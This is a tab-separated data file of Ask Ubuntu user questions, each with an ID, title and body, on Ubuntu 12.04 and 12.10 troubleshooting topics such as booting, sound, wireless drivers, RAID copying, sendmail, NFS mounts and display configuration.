233800	having trouble booting ubuntu 12.04 desktop from usb in windows 7	i have written the image onto my usb drive . everything went through , however once i restart my pc , it wont read the disk . do i need to open safemode to boot ? or should i reformat the drive and rewrite the iso to the stick ? i also created a partition on my hard drive for ubuntu . i formally had ubuntu 10 but i was unable to upgrade it so i removed it . please help !
233801	installing sound card on ec2 ubuntu	i have some application that needs sound card support , and i 'm using a ec2 ubuntu . can anyone advise how to install something like snd-dummy ?
233804	set action for submenu in appindicator	i am trying to build a simple indicator in c. this is my code : void make_indicator ( ) { //making the indicator appindicator = app_indicator_new ( `` my indicator '' , `` /home/alex/qt/normal_tray_icon/a.png '' , app_indicator_category_application_status ) ; //the construction of the main menu gtkwidget* indicatormenu = gtk_menu_new ( ) ; //adding a submenu gtkwidget* submenu1 = gtk_menu_item_new_with_label ( `` submenu1 '' ) ; gtk_menu_item_set_submenu ( gtk_menu_item ( submenu1 ) , indicatormenu ) ; /* here */ //here comes the error ! adding an option to the submenu gtkwidget* submenu1_option ; submenu1_option = gtk_menu_item_new_with_label ( `` submenu option ! `` ) ; gtk_menu_shell_append ( gtk_menu_shell ( submenu1 ) , submenu1_option ) ; //adding an option to the main menu and connecting it to a slot gtkwidget* showapp_option ; showapp_option = gtk_menu_item_new_with_label ( `` show app ! `` ) ; g_signal_connect ( showapp_option , `` activate '' , g_callback ( show_app ) , this ) ; gtk_menu_shell_append ( gtk_menu_shell ( indicatormenu ) , showapp_option ) ; //showing the indicator gtk_widget_show_all ( indicatormenu ) ; app_indicator_set_status ( appindicator , app_indicator_status_active ) ; app_indicator_set_attention_icon ( appindicator , `` dialog-warning '' ) ; app_indicator_set_menu ( appindicator , gtk_menu ( indicatormenu ) ) ; } i fail to add an action to a submenu . i add the submenu as a simple menu item , thus i can not append to it actions , or can i ? i do n't get error messages on compilation , but on run time i get : ( normal_tray_icon:9203 ) : glib-gobject-warning ** : invalid cast from `gtkmenuitem ' to `gtkmenushell' ( normal_tray_icon:9203 ) : gtk-critical ** : ia__gtk_menu_shell_insert : assertion `gtk_is_menu_shell ( menu_shell ) ' failed which i can understand but i do n't know how to solve . thanks for any answers .
233806	desktop icons replaced with home folder contents	i have an issue where my desktop is covered with the contents of my home folder rather than my desktop folder . i 've tried following this post : ubuntu desktop suddenly points to home folder but to no avail . if anyone has any tips that would be great : )
233819	copy entire filesystem in a folder where a raid-1 array is mounted	i am trying to migrate from a single disk drive system to a double disk drive software raid-1 system that already has a running system on it . meaning that formatting and having a new installation of ubuntu using raid-1 is not an option . in this process i have to copy the contents from main disk ( /dev/sda1 ) to mounted raid array ( /dev/md0 ) . first attempt to copy : sudo cp -dprx / /mnt/md1 second attempt to copy : sudo rsync -avxhaxs -- delete -- progress / /mnt/md1 both of them end with warnings . not sure if they end successfully . which command should i use ( from the two above or something else like dd ) and with which parameters in order to have the md1 raid-array prepared for next reboot ? edit : this is the warning message i got from `` cp '' command on my first attempt : cp : can not stat `/home/george/.gvfs ' : permission denied this is the error message i got from `` rsync '' command on my second attempt : rsync error : some files/attrs were not transferred ( see previous errors ) ( code 23 ) at main.c ( 1070 ) [ sender=3.0.9 ]
233821	ubuntu has no sound . how can i fix this ?	i have a home built pc and i did get stuttering sound until i followed this procedure . now i get no sound at all . it 's been 2 days now and i 'm completely lost .
233823	how to format a external hdd in fat32 to swap between ubuntu and windows 7	have a 750 gig external hdd . have format it in ubuntu 12.10 using fat32 since i have to switch between windows , linux and osx . used quick format option when doing this . have named drive but ubuntu does n't give drive letter . tried loading on windows 7 and drive comes up under manager as unallocated . any suggestions about how what i did wrong and how to fix this problem ? thanks . jh
233826	how to disable ubuntu one signin screen	whenever i reboot and login , a window titled `` back up '' and `` connect to ubuntu one '' appears , containing a button named `` sign into ubuntu one '' . i do n't like ubuntu one , nor any other proprietary cloud backup service , and i will never use ubuntu one . how do i disable it and/or permanently remove it ? i tried all the solutions suggested here , but i still get the window . i 've uninstalled all `` ubuntuone '' packages i can find , but this window still appears . oddly enough , even if i click the button , nothing happens .
233838	where is my no-ip installation ?	i just installed noip from the source code , however now i can not find it . i need to configure it still and i fear it 's broadcasting rogue somewhere with the wrong information .
233839	is it possible to get a list of all open files ( and the programs being used to view them ) ?	i want to write a script that obtains a list of all open programs and files , and then generates a shell script to re-open these files . for example , if i were editing the file example.txt using gedit , and editing the file myscript.js using geany , i would want to generate a script that could re-open both of these files using their respective programs . is there any way to obtain a list of running programs and files from the command line ?
233841	any apps for hosting a terminal app as a website ?	i 'm building a command line utility and one of my clients ( who 's not so computer savvy ) wants to have access to it . i was wondering , is there anything available that would let me redirect stdin/stout for a terminal app to a port as a website ? this would save me a lot of time . surely , there must be an ubuntu one-liner that can accomplish such a feat ... thanks for any pointers !
233842	i can not access wireless networking in ubuntu 12.10	i recently installed ubuntu 12.10 alongside windows 7 on a dell latitude d620 with an intel core 2 processor . i can not connect to a wireless network when using the operating system . when i use windows 7 , it connects to my router , along with many other devices . when i click on the network button at the top of the screen , it does n't list any wireless connections . how can i access my wireless internet connection ? ( note : i do n't have a wired connection , so i ca n't download any software ) lsusb bus 002 device 002 : id 413c : a005 dell computer corp. internal 2.0 hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 002 device 004 : id 0b97:7762 o2 micro , inc. oz776 smartcard reader lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 03:01.0 cardbus bridge : o2 micro , inc. oz601/6912/711e0 cardbus/smartcardbus controller ( rev 40 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5752 gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 )
233847	thunar files view , date format `` today , yesterday ''	the detail view of thunar shows the modification time as localized date ( dd.mm.yyyy for my location ) , which is fine , but i would like to see the time , too . and it does n't show the recently modified files in the same manner , butnew years new years decorates them as 'yesterday , today , monday ' and so on , which is a nice programming etude , but not really useful to me . au contraire - it is pretty annoying to have this mixture in the interface . the next version will look into my calender and mark some files 'easter 2007 , moms birthday 2002 ' and 'third monday of last month ' . thank you ! but if ohters prefer it - i 'm fine . i just want to know whether i can modify the setting somehow . this is xubuntu 12.04 lts , thunar 1.2.3 .
233854	directly shut down	i am using ubuntu 12.04 , which is installed on intel core i3 laptop . sometimes it hangs fully and do n't respond at all . in this situation , i shut it down directly 5 times ( total after installation ) from power switch . will it make any problem on my system ? is there any `` repair system '' like option in ubuntu like windows ( insert boot disk to repair windows ) ?
233855	create new directory in thunar , when view is full of files	to create a new directory in thunar , i can right-click on free space in the file view , and get an entry 'new directory ' in the context menu . if the directory contains enough files to fill the whole view , there is no free space to click and get that context menu . i can only click on files then , which brings up a different context menu , depending on the file type ( mime type/extension - does n't matter here ) . i 'm using the detail file-view and often have too many files to solve the problem by zooming . i do n't consider zooming in and out to be an acceptable part in the process of creating a directory . i do n't want to perform gymnastics , but to create a directory efficiently . i 'm searching for the way to do it - not for a workaround ! versions : xubuntu 12.04 lts , thunar 1.2.3
233857	is it possible to install autocad or an alternative on ubuntu ?	my relative wants to install ubuntu for his office purposes . he would definitely use autocad ( as well as other tools ) . would autocad work in ubuntu ? or are there any alternatives ?
233858	how to force installation of incompatible extensions in chromium/chrome ?	i was trying to install one of my favorite chrome/chromium extensions , awesome new tab page ( which i have successfully installed and ran on chromuim for ubuntu before , ) but it says that the extension is incompatible . i know for a fact that it is compatible ( and i want to test it out even if it stopped being compatible . ) i know that with firefox 's add-ons , you can simply click through to attempt a forcible installation of a supposedly incompatible add-on , but i ca n't seem to replicate this behavior in chromium . p.s. , the `` about '' page says this : version 20.0.1132.47 ubuntu 12.04 ( 144678 ) i will provide pretty much any other needed details , so just ask if i left anything out .
233867	configure says i do n't have lib , but aptitude says i do	i 've just run a configure script which alerts me : checking for gcry_control in -lgcrypt ... no configure : error : libgcrypt not found . install libgcrypt or use -- disable-libgcrypt . have a nice day . but when i run aptitude search libgcrypt , i find : v libgcrypt-dev - i libgcrypt11 - lgpl crypto library - runtime library p libgcrypt11-dbg - lgpl crypto library - debugger files i a libgcrypt11-dev - lgpl crypto library - development files p libgcrypt11-doc - lgpl crypto library - documentation am i in error ? if i do n't have the lib installed correctly , how should i rectify this matter ? when i try aptitude install libgcrypt-dev , i 'm told no packages will be installed , upgraded , or removed .
233870	create fully encrypted disk with 2 logical partitions ?	ideally i 'd like to use full-disk encryption but have two partitions . anyone know if this is possible ? ( even better , i 'd like to resize the one i have and add a partition , but this looks very daunting , based on my reading here and elsewhere ... ) running ubuntu 12.10 .
233871	is the disk image installation efficient enough ?	i was just wondering , is it efficient to have the entire ubuntu file system on a windows file . currently i am using the option to directly boot from ubuntu , as opposed to running it as an application in windows . even so , i notice a slow boot and sluggish performance . just to add , i am running a dual core , 1 gb ram machine . could the performance be slow due to low configuration of the machine .
233873	permissions fail to change , even using sudo nautilus	i 've read a lot of threads here but still ca n't seem to make this work : i 'm trying to share various folders ( any folders whatsoever ) on hdds other than `` file system '' over the lan using fresh install of ubuntu 12.04 with a fresh version of apache installed . other ( win xp ) computers can see the shared folders over the network no problem , but come up with the error : '' [ folder ] is not accessible . you might not have permission to use this network resource . contact the administrator ... '' ( the typical winxp `` access denied '' message ) since i can see them alright , i 've been led to believe that i need to set the folder permissions so that `` others '' can read , if not read/write . since these are folders on completely different hdds than my os , i should n't be too afraid of changing permissions ( right ? ) . so , even when i run sudo nautilus and go to the containing folder and right click - > properties - > permissions , i see : others folder access : none file access : -- - when i change folder access ( again , coming from nautilus window ) , it changes for about half a second and then revert . when i change file access , it stays in the drop-down , but does n't stick after closing and re-opening properties . `` allow executing file as program '' also instantly reverts . why ? ( and thank you ! )
233877	where does ubuntu store desktop environment options	i 'm currently working on a stripped-down purpose-built custom desktop environment on top of ubuntu . for most of the major desktop environments including gnome or any de you install after the fact ( kde , xfce , etc ... ) , they are added automatically to the list of available , optionable desktop environments for x11 when they 're installed . how would one go about manually adding a de boot option for the list of available de 's in ubuntu 12.10 or another version . i 'm assuming this is part of the x11 config somewhere but i '' m not seeing anything that is immediately apparent as the location for storing the available options ... i 'd like to have to option to switch back to gnome while i debug while developing the new de so that i can actively develop it in gnome , build , log off , choose my newly built de as the de to log into to test , etc ... help much appreciated !
233880	hp mini 311 webcam does n't work	i have problems with my webcam in win7 it 's works perfectly but in ubuntu 12.04 does n't work , i ca n't use the video call clients and even i ca n't take a photo or video with a software , i think that it 's the driver but i have no idea of which driver it
233882	how to download link with unicode using wget ?	sometimes a link has unicode characters in it , such as http : //www.example.com/файл.zip if you point your browser to it , it will properly prompt you to download the file as файл.zip . but if you try to do it with wget , the file comes with a mix of ? , percent encoding ( like % d0 % bb ) and the ( invalid encoding ) string after the filename . what parameters can i add to wget , or any other command line tricks , so that it behaves as chrome and firefox and saves the file exactly as specified in the rendered link - in this case , as файл.zip ? the solution should work without having to explicitly write it in the command , so an explicit wget -o файл.zip http : //www.example.com/файл.zip is not a good solution . i realize that as soon as you run wget http : //www.example.com/файл.zip it tries to retrieve http : //www.example.com/ % d1 % 84 % d0 % b0 % d0 % b9 % d0 % bb.zip , that is , it converts the link to percent encoding , which may be the reason why it saves it does n't render the filename `` properly '' . i posted a somewhat related question here , whose answer may or may not be of help to this one .
233884	how to install ubuntu on mac powerbook g4	how do i install ubuntu on a mac power book g4 running snowleapard step by step instructions would be great .
233885	inactive buttons in cheese on ubuntu 12.04	i upgraded to ubuntu 12.04 and now i get error messages in terminal when i run cheese . the program opens , but none of the buttons are active and preferences is not highlighted and ca n't be clicked on . therefore i ca n't run my webcam anymore . it worked fine in older versions of ubuntu . help ! the error message is : ( cheese:2332 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel
233886	ubuntu 12.04 on samsung galaxy ?	i have samsung galaxy pocket ( full model name : samsung galaxy gt-s5300 ) is there way to install ubuntu properly on this device ? if so , how to do so ? thanks .
233891	how do i get a wireless n 150 pci adapter dwa-525 working ?	can any one help me to install wireless n 150 pci adapter dwa-525 driver and configuration process on ubuntu 12.04 please ... ...
233894	why wo n't web apps install after i click intall in firefox ?	i am trying to install a couple web apps ( gmail , facebook ) . i get the prompt in firefox to install them . i click install and nothing happens . am i forgetting to do something ?
233900	free online ubuntu user guide , that is simple to understand ?	i just recently downloaded and started using ubuntu 12.04 lts and this is my first linux/unix os ever . i 've been faced with a gigantic learning curve that i think would deter most people . with that in mind , is there a free `` ubuntu for dummies '' type website/article/guide somewhere ? i mean , something that would even be as simple as to describe the difference between the windows file storage tabulation ( c : \windows ... etc ) vs linux tabulation ( etc/default/ ... etc etc etc ) . i am often researching things on how to improve / fix my ubuntu and am rapidly confused because the help forums make basic assumptions about ideas like this . i do n't necessarily already know where the `` etc '' folder is . i did n't even know what nautilus was even though i had already been using it . these are my problems . is there such a guide ? one which will be simple , and easy to understand ? one which will be free of charge ?
233904	multiple hadoop-env.sh with .deb hadoop package	this quickstart guide mentions configuring java_home in hadoop-env.sh . this is supposed to be located in the hadoop installation directory . however , i installed this from a 1.0.4 .deb package on ubuntu 12.04 . this creates multiple hadoop-env.sh and the startup scripts at /usr/sbin . i 'm not sure which hadoop-env.sh i should use for my configuration . a related question is what directory should be specified as hadoop_home . from the wiki : hadoop_home is the parent directory of the bin directory that holds the hadoop scripts i 'm sure they do n't mean the parent of /usr/sbin though . $ > locate hadoop-env.sh yields : /etc/default/hadoop-env.sh /etc/hadoop/hadoop-env.sh /etc/profile.d/hadoop-env.sh /usr/sbin/update-hadoop-env.sh /usr/share/hadoop/templates/conf/hadoop-env.sh i am also using this for reference since i 'm setting up a single-node cluster . i think i downloaded the deb package from cloudera but i ca n't recall at the moment and i 'm considering restarting the installation
233908	can i prevent /tmp being deleted if the computer crashes ?	i often stick temporary files that i 'm working on in /tmp , so i do n't have to delete them once i 'm done . however , if the computer crashes , then i 'm out of luck , because that directory will be wiped . is there a way to prevent /tmp being wiped if the computer is restarting from a crash ? if not , is there another solution , such as creating another temporary directory elsewhere and have it automatically deleted on restart if there is no crash .
233910	where i can find the wacom configuration file in ubuntu 12.04 ?	i want to know the location of the configuration file created with the wacom tablet tool in ubuntu 12.04 , i want to change the preassure curve and another settings manually.. thanks and have a good day
233913	reset all programs to use same audio output	background : so through some messing around or some sort that i 've done with my audio , i 've found that some programs are set to use my built-in audio , and others are set to use my sound card . while i know i can manually change each program , when it 's playing audio , which output device it 's using in pavucontrol , this can be kind of tedious . question : is there a way to automatically set all programs , whether they 're currently playing sound or not , to use a single output device ?
233918	sendmail does n't send email to specific domain email address	we have ubuntu 12.04 server and installed sendmail to send mails from this server . problem : there is some strange issue on mail server . somehow , server not able to send email to xxx @ ayolla.com but server sends email successfully to other email ids like xxx @ spaceotechnologies.com , xxx @ gmail.com or xxx @ yahoo.com . success case : when send email to xxx @ spaceotechnologies.com dec 28 11:40:49 ip-10-99-66-252 sm-mta [ 16954 ] : qbsbemdx016952 : to= , ctladdr= ( 33/33 ) , delay=00:00:01 , xdelay=00:00:01 , mailer=esmtp , pri=120352 , relay=aspmx.l.google.com . [ 74.125.131.27 ] , dsn=2.0.0 , stat=sent ( ok 1356694874 d3si34930711vdv.119 ) dec 28 11:51:43 ip-10-99-66-252 sendmail [ 16960 ] : qbsbphki016960 : from=www-data , size=89 , class=0 , nrcpts=1 , msgid= < 201212281151.qbsbphki016960 @ ayolla.com > , relay=www-data @ localhost fail case : when send email to xxx @ ayolla.com dec 28 11:51:43 ip-10-99-66-252 sm-mta [ 16962 ] : qbsbphso016962 : ... user unknown dec 28 11:51:43 ip-10-99-66-252 sendmail [ 16960 ] : qbsbphki016960 : to=info @ ayolla.com , ctladdr=www-data ( 33/33 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=30089 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=5.1.1 , stat=user unknown can someone please help to sort out this issue ? note : i do n't want to expose our emails that 's why i replaced xxx with original email address into this question .
233919	i can not reinstall cinnamon on ubuntu 12.04 . how can i do so ?	i had installed cinnamon 1.4 on ubuntu 12.04 earlier but i could n't upgrade it to 1.6+ . i uninstalled ( and purged ) it to do a fresh install ; but now i am getting an error as follows : sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cinnamon i tried installing the foo packages ( needed for cinnamon ) but i get the same error : sudo apt-get install foo1 foo2 foo3 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package foo1 e : unable to locate package foo2 e : unable to locate package foo3 i tried updating the repositories using apt-get update but it is no use .
233920	nfs share in /etc/fstab does n't mount on startup	i have an nfs share i 'm trying to mount automatically at startup in ubuntu / xbmc i have the following in /etc/fstab nas : /mnt/raid /mnt/raid nfs noauto , rw , async on startup the mount does n't automatically occur . if i issue a manual mount command it works : $ sudo mount -o noauto , rw , async -t nfs nas : /mnt/raid /mnt/raid how can i get this mount to occur automatically on startup ? looking for errors in /var/log/messages does n't yield much , but it does say something about nodiskmount : kernel command line : \ boot_image=/boot/vmlinuz-2.6.32-29-generic \ root=uuid=e575a39a-09d9-4747-befa-466c7aae64d1 \ ro quiet splash \ xbmc=autostart , nodiskmount \ < -- this line loglevel=0 \ video=vesafb could this be the problem ? is there any way to disable nodiskmount ? i am using the xbmcfreak livecd 10 from xbmcfreak.nl which is based on ubuntu lucid lynx $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.2 lts - xbmclive release : 10.04 codename : lucid
233921	laptop battery does n't last that long compared to windows	i 'm using ubuntu 12.10 with gnome 3.6 on a dell inspiron n5010 laptop , but i have a problem with the power handling/battery . as soon as i disconnect my charger , the battery starts discharging from an indication of 51 % and it lasts for only 1 hour . compared two hours in windows 7 , this is a major difference . i 've installed jupiter and i do n't see any change . i 'd appreciate some help on this , as i would like to keep using ubuntu now .
233923	system does not shut down . what can i do ?	i am using ubuntu os for one year . currently i am using ubuntu 12.04lts . when i click the shutdown button i am directed back to the login screen instead . it has become difficult to shut down . what can i do to enable shutdown again ?
233938	anatomy and terminology of unity - dash , hud , launcher and panel ?	just for reference for those who have n't installed unity yet - what is the difference between these elements ? update after tom kindly pointed me around , here is the summary : dash - semantic search among local applications and documents , and online resources . accessed by tapping the super ( win ) key ( screenshot ) hud - keyboard access to menus of the current application . accessed by tapping the alt key . launcher - the dock ( task ) bar . win/super + 1-9 launch applications pinned to it panel - imprecise term for the top menu bar i 've also updated the wikipedia article on unity to start by identifying the unity ui elements . the question could now be closed .
233943	how can i re-order ld_library_path ?	how can i re-order ld_library_path ? edit : i 'm interested in ld_library_path because i have this problem : i ca n't update , upgrade and remove my app from kubuntu and one of the error is due to libreadline.so , but how i explaind here : http : //dba.stackexchange.com/questions/31143/libreadline-so-6 it is important for postgresql . in a comment phil said to me : you can probably fix this by re-ordering your ld_library_path so that /usr/local/lib/ is > at the end , rather than the beginning .
233944	setting proxy variables automatically for different network profiles	i have two network profiles for wired connections in the network manager : 1 . home_lan -- > automatic dhcp requires no proxy 2 . hostel_lan -- > manual ip settings requires an automatic proxy url now , i can see these profiles in /etc/networkmanager/system-connections folder . i checked this article on using the ifup.d and ifdown.d scripts to run user defined scripts for specific tasks . i understand bits of it . i want to be able to make a script and run it on the ifup event depending upon the network profile in my network manager . i understand that the ifup.d scripts responds to interfaces defined in the /etc/network/interfaces file . however my /etc/network/interfaces file looks like this : auto lo iface lo inet loopback so my network profiles are listed in the network manager folder and not in the /etc/network/interfaces file . there is also a networkmanager.conf file which says : [ ifupdown ] managed=false i checked the networkmanager manpage and itsays that the ifupdown = true|false `` controls whether interfaces listed in the 'interfaces ' file are managed by networkmanager . if set to true , then interfaces listed in /etc/network/interfaces are managed by networkmanager . '' now i am relatively new to ubuntu and i do not really play around with settings , i am just not able to put it all together . what am i missing ?
233946	how can i recover my data after choosing âerase disk and install ubuntuâ ?	i installed ubuntu 12.04 on my laptop and chose the option `` erase disk and install ubuntu '' from liveusb without any backup . when i realized that this would format my whole hdd , i immediately unplugged the usb and turn off my laptop . however , it seems that my whole hdd had been formatted : i have 4 partitions before but there 's only 1 partition formatted in ext4 now with the size equal the hdd 's size . is there anyway i can get my data back ? i believe that my data is still there on the disk . i 've searched for a while and tried using testdisk and parted but no luck : testdisk can not find any partition even after trying `` deeper search ''
233953	how to use intel n2800 / gma 3650 in 12.10 ?	so my friends start buying these n2600/2800 netbooks . in 12.04 kde kind of works . but now i tried to install 12.10 on n2800 . installation went fine but it wo n't boot and there are no cedarview-* packages in repos .
233955	how can i change my 12.04 login screen ?	i want to change my ubuntu 12.04 login screen . i tried using ubuntu tweak and lightdm manager but none of them worked.after changing the image in tweak , i logged and changed the desktop image but nothing changed.while using lightdm manager too no changes were seen .
233958	where is the unity dash officially defined ?	i 've updated the unity article on wikipedia and need a better reference from the source on the dash . however , i ca n't seem to find any sort of official definition of just what exactly what the dash is , anywhere on canonical.com , ubuntu.com , or mark 's blog . what the heck . to clarify , i 'm looking for a post from a source , be it canonical or a 3rd party but reliable source , that focuses primarily on the dash . this post comes close , but it 's more of an essay on the progress of the work on dash , rather than an intro/presentation/definition .
233961	when i boot i do not get asked which os i want	i just installed wubi on my computer which is running windows xp . everything went exactly like the official guide said it should , and i was told the installation was complete and to restart my computer . however when i boot the boot-loader does not appear . there is a problem with the fan of the computer , and each time i boot i am asked if i wanted to continue , and i have to press f2 within 5 seconds otherwise the computer shuts down . i do not see a bios screen for this reason , so i do not know how to get to the boot menu .
233965	boot to specific os depending on power-on button	i have both ubuntu and windows installed on my computer . on my previous ubuntu install turning the computer on by pressing the normal power-on button would boot the system directly to ubuntu ( grub_timeout was set to 0 ) . turning the computer on pressing the assist button would boot directly to windows . after removing and reinstalling ubuntu the assist button no longer boots to windows . where and how can i configure the system to boot a specific os depending on the power-on button ?
233968	lost all the data after installing ubuntu 12.10	i installed ubuntu 12.10 on my laptop . while installing two options were available : install ubuntu alongside windows 7 replace windows 7 my laptop had 3 drives . windows 7 was installed on c : drive and there was data on other two drives . i chose option to replace windows 7 . but now in ubuntu , there is only one drive . its size is approximately equals the hard-disk size and it is almost free , so it seems like all the data is lost . could anyone please help me on this ? would it be possible to recover the lost data ?
233970	can i make my ubuntu make sounds when i press caps lock etc . ?	on the computer upstairs we have an option to make the computer make a sound when we press caps lock , number lock and scroll lock . is there a way to do this on ubuntu 12.04 ?
233979	ubuntu software center takes about five minutes to load . can i make it load faster ?	the problem is with software center . it takes about 8-9 minutes to open and this seems very slow to me . how can i make software center start up faster ? my pc : ram : 512mb cpu : intel celeron 2.27ghz graphic card : nvidia geforce fx5200 ( with the 173 drivers ) driver installed with command sudo apt-get install nvidia-173-updates os : ubuntu 12.04 ( precise pangolin ) internet connection : about 4mbps
233983	license agreement wo n't go from terminal	after i install software via apt-get from the terminal i get the following : truetype core fonts for the web eula end-user license agreement for microsoft software important-read carefully : this microsoft end-user license agreement ( `` eula '' ) is a legal agreement between you ( either an individual or a single entity ) and microsoft corporation for the microsoft software accompanying this eula , which includes computer software and may include associated media , printed materials , and `` on-line '' or electronic documentation ( `` software product '' or `` software '' ) . by exercising your rights to make and use copies of the software product , you agree to be bound by the terms of this eula . if you do not agree to the terms of this eula , you may not use the software product . < ok > pressing enter does not make the message go away . how can i proceed ?
233984	can ubuntu use multiple devices for downloading ?	let me give an example : i have one laptop , it is connected to 3 different networks all with access to internet . one device uses eth0 , another uses wlan0 and a third one uses wlan1 . does ubuntu knows how to use all connection together to download a file ? is that even possible ? the point is having a faster data transfer rate .
233986	how to connect lg p 880 4x hd with pc ?	i would like to connect my lg p 880 4x hd with my pc . i have ubuntu 12.04 . the mtp mode does n't work and i do n't know what to do ? can somebody help me ?
233989	ubuntu not showing up in windows 7 network	i have a windows 7 laptop and ubuntu desktop , and both are connected to the same network , i can see the windows laptop in ubuntu 's network , also i can access it , copy past files , on windows i can not see ubuntu in the network . i want to use synergy and use ubuntu as server , i 've done all the configuration . desktop ip is 192.168.0.101 when i enter '\\192.168.0.101 ' in run in windows , it says it can not find the network path , and synergy gives a timeout error . i know the issue seems to be with windows , hope i can get some support here . this setup ( sharing and synergy ) has worked with 10.10 now i 'm using 12.04 .
233990	dual screen reset after restart	i have an xubuntu system : $ uname -a linux tnick-desktop 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ lsb_release -a distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal with an nvidia video card : $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation g96 [ geforce 9500 gt ] ( rev a1 ) when i first installed xubuntu and nvidia 's current driver all went fine . i was able to use nvidia-settings to configure the monitors to show a side-by-side view , saved the xorg.conf file and everything worked fine . some days ago i was curious about settings manager > display section . i went looking , did not change anything and that was that . however , ever since , when i restart the system the layout that is saved in xorg.comf is not applied , so each and every time i have to use nvidia-settings , lay them out side by side and apply this . i tried using sudo nvidia-settings but that made no difference ( not that i was expecting it to , but it was suggested in a question here ) . i also tried un-install - restart - install - restart - nvidia-settings , lay them out - restart but that gave me black screens after xubuntu logo , then , on third attempt , went back to same view on both displays . the content of the xorg.conf file does not change between sessions : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.51 ( buildd @ batsu ) fri oct 12 12:53:54 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` lg electronics l1942 '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9500 gt '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` crt : nvidia-auto-select +1920+0 , dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection i tried to install nvidia binary x.org driver ( version 173 ) but ended up in an error pretty soon : the following packages have unmet dependencies : nvidia-173 : depends : x11-common ( > = 1:7.0.0 ) but 1:7.7+1ubuntu4 is to be installed depends : xorg-video-abi-12 but it is not going to be installed depends : xserver-xorg-core ( > = 2:1.10.99.901 ) but 2:1.13.0-0ubuntu6.1 is to be installed with an crash report detected message . apart from reinstalling the system , what else should i try ?
233999	headphones not working in ubuntu 12.10	i 've tried multiple ways to solve my problem as described in other topics in this forum , but none succeeded . the headphones sound worked when i first installed ubuntu 12.10 , but after a few updates it ceased to function . sound works fine with the speakers but as soon as i insert the jack , there is nothing but silence . i 've checked alsamixer and when i insert the jack it mutes the speakers but not the headphones column . i 've even tried installing the drivers from realtek but it was a very bad idea since it crashed my os completely and i had to re-install everything . i 'm a bit on the newbie in this ubuntu thing in case you have n't noticed ; ) anyway i would really appreciate some help here since i have a small baby and she sleeps a lot so i ca n't disturb her with the sound coming from the speakers . i have a toshiba satellite p200-1ie and ubunto 12.10 . thanks in advance
234005	is there a repository ( ppa ) that collects closed-source , non-free software ?	if i am not mistaken , programs like spotify or steam are not included in any of the ubuntu repositories ( main , restricted , ... ) . and i guess they will never be ? correct me if i am wrong . if i am right , is there a ppa that provides a collection of closed-source , non-free software and takes care of updates ?
